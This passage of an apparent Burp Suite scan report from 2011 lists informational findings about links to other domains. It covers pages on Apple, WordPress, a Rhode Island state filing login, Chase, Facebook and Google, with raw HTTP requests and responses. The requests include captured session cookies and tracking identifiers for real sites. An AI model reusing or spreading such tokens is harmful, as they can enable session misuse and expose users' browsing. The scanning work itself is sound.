Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; ccl=1FciQd7giiJFEgv4vVPtMCBm7MZFgP3pI/vKQFStWClpRPhHQ3zP3nifi6OoK7SJm2x8HuCaAZ0okoSGVfzga0qB+Yj/bOcikQ4AhQPJ2J9zYOJu8IlZkWZf5AOzCPtxm33ikuaRS52LsB2FYvoSdBdbx9M53ArvvI4ElGA2adH+6bhRVxCRalHv2m0y3p+0yBuW5NB9xNj7uDFQhY+GWBCl8WtASWNuA3Rz8Q5J+ucOFGHueE7DC+Kka0HSvZ0uhTmjNtru2ipqpkoKe4kTNSyeoI/hT4HgUMiUzszj0f0J7fm4K2wp3h7NHocDwWbooSP/RMUOkiLNwaYD+3Ed+3JYffJC9wt3JNLtCSI3BEIqS8c3L5WKXc3/sHFN3A+qpiIGFCS0dOwXNofTCtSVi9mz2BtrPek+4uHVXMFWNrxir5yGDH2GG/p9aLl5uDHiPAzTXvR2c957Yq6MKYQm9hBiD+5/qGaJcz9SC3ShTTM5oxp2A46dVTVnaO9vqJYb2G5nEMOBaTiIOETdHfzDXMUQmGYLD6SzeZOPV9zbf7zIe9WDPN2D/Mpqw3CWYAvm; geo=US; s_ria=Flash%2010%7C; s_orientation=%5B%5BB%5D%5D; s_cc=true; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D3%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B; s_sq=appleitunes%2Cappleusitunesipod%3D%2526pid%253Ditunes%252520-%252520download%252520itunes%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Flegal%25252Fprivacy%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleusitunestop100%3D%2526pid%253Ditunes%252520-%252520itunes%252520charts%252520-%252520songs%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fitunes%25252Fhow-to%25252F%2526ot%253DA; s_orientationHeight=823

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 12 Jul 2011 20:43:55 GMT
x-apple-lok-response-date: Tue Jul 12 13:46:20 PDT 2011
x-apple-lok-current-storefront: <null>
x-apple-orig-url-path: /us/app/katango/id447742732?ls=1&mt=8
x-apple-application-site: NWK
x-apple-aka-ttl: Generated Tue Jul 12 13:46:20 PDT 2011, Expires Tue Jul 12 13:47:20 PDT 2011, TTL 60s
x-apple-lok-stor: memcached
Content-Type: text/html; charset=UTF-8
x-apple-lok-expire-date: Tue Jul 12 13:47:55 PDT 2011
x-webobjects-loadaverage: 0
x-apple-application-instance: 1000312
x-apple-lok-path: v0_1:MZStore/viewSoftware&cc=us&id=447742732&ls=1&mt=8-143441,pc-8-Ak
x-apple-max-age: 3600
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?ls=1&mt=8&id=447742732&cc=us
x-apple-lok-ttl: Generated Tue Jul 12 13:43:55 PDT 2011, Expires Tue Jul 12 13:47:55 PDT 2011, TTL 240s
Content-Length: 30965
Vary: Accept-Encoding
Expires: Tue, 12 Jul 2011 20:46:20 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 12 Jul 2011 20:46:20 GMT
Connection: close
Set-Cookie: ls=1; version="1"; max-age=30; expires=Tue, 12-Jul-2011 20:44:25 GMT; path=/; domain=.apple.com
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">

<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="http://r.mzstatic.com/htmlResources/9326/web-storefront-base.cssz" />
<link rel="stylesheet" type="text/css" href="http://r.mzstatic.com/htmlResources/9326/web-storefront-preview.cssz" />

<script type="text/javascript" charset="utf-8" src="http://itunes.apple.com/WebObjects/MZStore.woa/wa/ajaxCache?id=e00d64ec235ca1687cd7af626c70d9ac.js">
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/9326/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/9326/web-storefront-preview.jsz"></script>
...[SNIP]...
<h2><img src="http://ax.phobos.apple.com.edgesuite.net/images/web/itunes_preview/itunespreview_en.png" alt="iTunes" height="32" width="263"></h2>
...[SNIP]...
<div class="app-links"><a rel="nofollow" target="_blank" href="http://www.katango.com" class="see-all">CafeBots Inc. Web Site</a><a rel="nofollow" target="_blank" href="http://www.surveymonkey.com/s/ikatango" class="see-all">Katango Support</a>
...[SNIP]...
<div class="lockup"><img alt="iPhone Screenshot 1" class="portrait" src="http://a2.mzstatic.com/us/r1000/102/Purple/2e/0e/33/mzl.xxkyinno.320x480-75.jpg" /></div><div class="lockup"><img alt="iPhone Screenshot 2" class="portrait" src="http://a2.mzstatic.com/us/r1000/112/Purple/0c/8a/06/mzl.lmolflmr.320x480-75.jpg" /></div><div class="lockup"><img alt="iPhone Screenshot 3" class="portrait" src="http://a1.mzstatic.com/us/r1000/090/Purple/f7/0c/43/mzl.wlsmxryd.320x480-75.jpg" /></div><div class="lockup"><img alt="iPhone Screenshot 4" class="portrait" src="http://a5.mzstatic.com/us/r1000/112/Purple/8b/95/4b/mzl.jhkdtgez.320x480-75.jpg" /></div><div class="lockup"><img alt="iPhone Screenshot 5" class="portrait" src="http://a2.mzstatic.com/us/r1000/117/Purple/6e/17/e4/mzl.wicbkpaf.320x480-75.jpg" /></div>
...[SNIP]...
<div class="artwork"><img width="175" height="175" alt="Katango" class="artwork" src="http://a3.mzstatic.com/us/r1000/102/Purple/1e/8c/0e/mzm.rcevvdvw.175x175-75.jpg" /><span class="mask">
...[SNIP]...
<div class="artwork"><img width="75" height="75" alt="Caller Photo (Facebook Photos + Updates Sync)" class="artwork" src="http://a5.mzstatic.com/us/r1000/057/Purple/3b/4b/65/mzm.lbjamdek.75x75-65.jpg" /><span class="mask">
...[SNIP]...
<div class="fbfan">
       <iframe src="http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:230px; height:63px;" allowTransparency="true"></iframe>
   </div>
   <div class="fbfan last">
       <iframe src="http://www.facebook.com/plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:250px; height:63px;" allowTransparency="true"></iframe>
...[SNIP]...

16.5. http://s2.wp.com/wp-content/mu-plugins/post-react-1/sharing/sharing.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s2.wp.com
Path:	/wp-content/mu-plugins/post-react-1/sharing/sharing.js

Issue detail

The page was loaded from a URL containing a query string:

http://s2.wp.com/wp-content/mu-plugins/post-react-1/sharing/sharing.js?m=1308095308g&ver=0.2

The response contains the following link to another domain:

https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

Request

GET /wp-content/mu-plugins/post-react-1/sharing/sharing.js?m=1308095308g&ver=0.2 HTTP/1.1
Host: s2.wp.com
Proxy-Connection: keep-alive
Referer: http://blog.katango.com/2011/07/05/how-facebook-affects-your-relationships-infographic/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Type: application/x-javascript
Date: Tue, 12 Jul 2011 20:47:11 GMT
Expires: Wed, 11 Jul 2012 20:47:11 GMT
Last-Modified: Wed, 15 Jun 2011 05:14:30 GMT
Server: ECS (dca/53E6)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 31917

(function($){$.fn.extend({share_is_email:function(value){return/^((([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])+(\.([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0
...[SNIP]...
udioCaptchaHtml:function(){var a=Recaptcha,b=RecaptchaState,c=b.server+"image?c="+b.challenge;if(c.indexOf("https://")==0)c="http://"+c.substring(8);b=b.server+"/img/audiocaptcha.swf?v2";a=a._is_ie()?'<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="audiocaptcha" width="0" height="0" codebase="https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param name="movie" value="'+b+'" />
...[SNIP]...

16.6. http://ucc.state.ri.us/loginsystem/login.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/loginsystem/login.asp

Issue detail

The page was loaded from a URL containing a query string:

http://ucc.state.ri.us/loginsystem/login.asp?FilingMethod=

The response contains the following links to other domains:

http://home.netscape.com/download
http://www.microsoft.com/ie/download

Request

GET /loginsystem/login.asp?FilingMethod= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:48:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3867
Content-Type: text/html
Expires: Tue, 12 Jul 2011 00:48:06 GMT
Cache-control: no-cache

<SCRIPT LANGUAGE="JavaScript">
// <!--
var Worklist = ""
if (Worklist != "True"){
window.location = "http://ucc.state.ri.us/loginsystem/login_form.asp";
}
if (Worklist == "True")
...[SNIP]...
<UL>
If your browser does not support JavaScript, you can upgrade to a newer
browser, such as <A href="http://www.microsoft.com/ie/download">Internet
Explorer 5</A>  and <A href="http://home.netscape.com/download">Netscape Browser
4.7.</A>
...[SNIP]...

16.7. http://ucc.state.ri.us/ucc/uccmenu.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/ucc/uccmenu.asp

Issue detail

The page was loaded from a URL containing a query string:

http://ucc.state.ri.us/ucc/uccmenu.asp?FilingMethod=I

The response contains the following links to other domains:

http://www.ri.gov/subscriber/
http://www.sos.ri.gov/business/ucc

Request

GET /ucc/uccmenu.asp?FilingMethod=I HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 7306
Content-Type: text/html
Expires: Wed, 13 Jul 2011 00:45:54 GMT
Cache-control: no-cache

<html>
<head>
<script LANGUAGE="JavaScript">
<!--
function ucc3() {
if (document.UCCMenu.UCC3MENU.value=='0') {
alert('You have to select a correct UCC3 type in the list box!');
return false;
...[SNIP]...
>
RI.Gov, the State of Rhode Island's payment processing vendor, is now offering subscriber payment options for our high-volume filers
interested in monthly invoicing options. To learn more, click <a href="http://www.ri.gov/subscriber/"> here </a>
...[SNIP]...
<td>Click <a href="http://www.sos.ri.gov/business/ucc">HERE</a>
...[SNIP]...

16.8. https://www.chase.com/ccp/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.chase.com
Path:	/ccp/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/individuals/shared/page/OpenAnAccount

The response contains the following link to another domain:

https://ad.doubleclick.net/activity;src=1537107;type=retai207;cat=accou524;ord=1?

Request

GET /ccp/index.jsp?pg_name=ccpmapp/individuals/shared/page/OpenAnAccount HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/generic/shared/page/chase_search&q=xss&emptyQueryText=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:15:56 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close
Content-Length: 58091

<html LANG="EN" >

<head>

<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/ChaseGlobal.css'/>

<script language="Javascript1.2" type="tex
...[SNIP]...
<NOSCRIPT>
<IMG SRC="https://ad.doubleclick.net/activity;src=1537107;type=retai207;cat=accou524;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0>
</NOSCRIPT>
...[SNIP]...

16.9. https://www.chase.com/ccp/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.chase.com
Path:	/ccp/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/generic/shared/page/chase_search&q=xss&emptyQueryText=false

The response contains the following link to another domain:

https://careers.jpmorganchase.com/cm/cs?pagename=Chase/Href&urlname=jpmc/careers

Request

GET /ccp/index.jsp?pg_name=ccpmapp/generic/shared/page/chase_search&q=xss&emptyQueryText=false HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/jsp/SearchPage.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=J7K3TcxWLP29zSLjK11TchjW3ydQvwFRmsxsnT2L2Gzmn2NqR6jq!1272186516

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:15:19 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 22693

<html LANG="EN" >

<head>

<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/content.css'/>
<script language='Javas
...[SNIP]...
</span><A href="https://careers.jpmorganchase.com/cm/cs?pagename=Chase/Href&urlname=jpmc/careers" class="footerLink">Careers</A>
...[SNIP]...

16.10. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?app_id=211603812203681&href&send=true&layout=standard&width=450&show_faces=false&action=recommend&colorscheme=light&font=arial&height=35

The response contains the following link to another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/gn-vukSYjxu.css

Request

Response

16.11. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/276877_100484820802_650394_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/AkRFnpL1mZ1.js
http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/P7734y4-nbQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/HtKmjNpO-nZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/zsO1NRKSlnU.js
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/FsUMU7xqUC9.js
http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/mUtcQs1GePe.css
http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/2Gxt2Kl4nW6.js

Request

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

16.12. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fhomedepot&width=256&colorscheme=light&show_faces=false&stream=true&header=false&height=395

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/203621_106485550030_3042003_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/PlR5NIwei7d.js
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/AkRFnpL1mZ1.js
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/P7734y4-nbQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/HtKmjNpO-nZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/zsO1NRKSlnU.js
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/FsUMU7xqUC9.js
http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/mUtcQs1GePe.css
http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/2Gxt2Kl4nW6.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.91.65
X-Cnection: close
Date: Tue, 12 Jul 2011 16:35:52 GMT
Content-Length: 9659

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Content-Language" content="en" /><script>Cavalr
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/HtKmjNpO-nZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/mUtcQs1GePe.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/P7734y4-nbQ.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/AkRFnpL1mZ1.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/zsO1NRKSlnU.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/2Gxt2Kl4nW6.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/FsUMU7xqUC9.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/PlR5NIwei7d.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/homedepot" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203621_106485550030_3042003_q.jpg" alt="The Home Depot" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="throbber img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" id="stream_loading_indicator" width="32" height="32" /></div>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1" aria-hidden="true"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

16.13. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/23301_286893159420_2873_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/AkRFnpL1mZ1.js
http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/P7734y4-nbQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/HtKmjNpO-nZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/zsO1NRKSlnU.js
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/FsUMU7xqUC9.js
http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/mUtcQs1GePe.css
http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/2Gxt2Kl4nW6.js

Request

GET /plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/katango/id447742732?ls=1&mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

16.14. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=adobe+psirt

The response contains the following links to other domains:

http://webcache.googleusercontent.com/search?q=cache:GxlGRoyWGSAJ:www.first.org/members/teams/adobe_psirt/+adobe+psirt&cd=7.PPc!l...E4QIDAG')
http://webcache.googleusercontent.com/search?q=cache:IHzwNSQbf00J:blogs.adobe.com/psirt/2010/11/potential-issue-in-adobe-reader.html+adobe+psirt&cd=3.PP3!...-DIQIDAC')
http://webcache.googleusercontent.com/search?q=cache:Ku6IsruuA4cJ:www.infosecblog.org/2009/06/adobe-psirt-advance-notice-of-adobe-acrobatreader-updates/+adobe+psirt&cd=9.PPC!.C..}FoQIDAI')
http://webcache.googleusercontent.com/search?q=cache:QPhm8Fbqep4J:blogs.adobe.com/psirt/+adobe+psirt&cd=13P..c!...-BoQIDAA')
http://webcache.googleusercontent.com/search?q=cache:jUHQi21c0mMJ:blogs.adobe.com/psirt/2009/12/new_adobe_reader_and_acrobat_v.html+adobe+psirt&cd=6.PPc!...-EcQIDAF')
http://webcache.googleusercontent.com/search?q=cache:jwApyPTljV8J:blogs.adobe.com/psirt/2009/04/update_on_adobe_reader_issue.html+adobe+psirt&cd=4.PPc!...-DkQIDAD')
http://webcache.googleusercontent.com/search?q=cache:qGlifiQIoFQJ:blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html+adobe+psirtSY..3!x.-EAQIDAE')
http://webcache.googleusercontent.com/search?q=cache:qVETzaBg0AgJ:blogs.adobe.com/psirt/2008/05/potential_flash_player_issue.html+adobe+psirt&cd=2.PPC!.z.-CsQIDAB')
http://webcache.googleusercontent.com/search?q=cache:umLbkOmqYiIJ:tna.europarchive.org/20110106102426/blogs.adobe.com/psirt/+adobe+psirt&cd=8.PP3!.;..eFQQIDAH')

Request

GET /search?sourceid=chrome&ie=UTF-8&q=adobe+psirt HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: vD843DpA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=PrTm1sPBV8WcGKUpX24DX5FxWwEiYnRIQG1U8UDSmVNfNlXO4RsMbeCllROY8jurLY0nQ0ao8uAFMmNgXjVJP4Qp83yBr8GEcfw9vqYyVe1aEd9Jnty9TfIHuCmfrKOA

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:08 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 40678

ShjDd-Or....S....L...g......Y.....as#..adobe psirt.7%..kKLEcTsP5BOfy0gHcotTGBw",kEXPI:"17259,23756,24692,24878,24879,27400,28505,28936,29702,29859,30316,30465,31116,31259,31303,31405",kCSI:{e:"17259,
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:QPhm8Fbqep4J:blogs.adobe.com/psirt/+adobe+psirt&cd=13P..c!...-BoQIDAA')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:qVETzaBg0AgJ:blogs.adobe.com/psirt/2008/05/potential_flash_player_issue.html+adobe+psirt&cd=2.PPC!.z.-CsQIDAB')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:IHzwNSQbf00J:blogs.adobe.com/psirt/2010/11/potential-issue-in-adobe-reader.html+adobe+psirt&cd=3.PP3!...-DIQIDAC')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:jwApyPTljV8J:blogs.adobe.com/psirt/2009/04/update_on_adobe_reader_issue.html+adobe+psirt&cd=4.PPc!...-DkQIDAD')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:qGlifiQIoFQJ:blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html+adobe+psirtSY..3!x.-EAQIDAE')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:jUHQi21c0mMJ:blogs.adobe.com/psirt/2009/12/new_adobe_reader_and_acrobat_v.html+adobe+psirt&cd=6.PPc!...-EcQIDAF')">Cached</a>
